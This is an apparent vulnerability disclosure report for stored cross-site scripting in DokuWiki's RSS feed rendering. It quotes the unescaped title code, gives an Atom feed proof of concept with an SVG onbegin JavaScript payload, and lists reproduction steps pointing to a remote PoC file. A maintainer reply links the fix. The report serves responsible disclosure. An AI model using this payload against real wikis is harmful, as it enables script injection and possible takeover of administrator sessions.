Stored cross-site scripting via RSS feed in splitbrain/dokuwiki
Reported on
May 13th 2023
Description
Due to the improper handling of RSS titles in inc/parser/xhtml.php, a malicious RSS feed can be used to inject arbitrary HTML elements into the page, resulting in cross-site scripting.
inc/parser/xhtml.php line 1292-1294
} else {
$this->doc .= ' '.$item->get_title();
}
Proof of Concept
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-US">
<title type="text">test</title>
<entry>
<title type="html"><![CDATA[<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s></animate></svg>]]></title>
</entry>
</feed>
Steps to reproduce
1. Write the following contents to a page: (This URL contains the PoC above.)
{{rss>https://ry0tak.github.io/8941fbce9a754868b279b57d01dc6ef1cb9c74621b864edeb3d79b5f6a6ec375/poc.xml}}
2. Confirm that alert(document.domain) is executed after saving the page.
Impact
An attacker can execute arbitrary JavaScript on Dokuwiki origin. Since administrators can install plugins, this could result in remote code execution if the administrator opens a page with crafted content.
Occurrences
Thanks for the report. Fix is in progress https://github.com/dokuwiki/dokuwiki/pull/3967
Hi @splitbrain, thank you so much for fixing this issue! Can you please assign a CVE ID for this?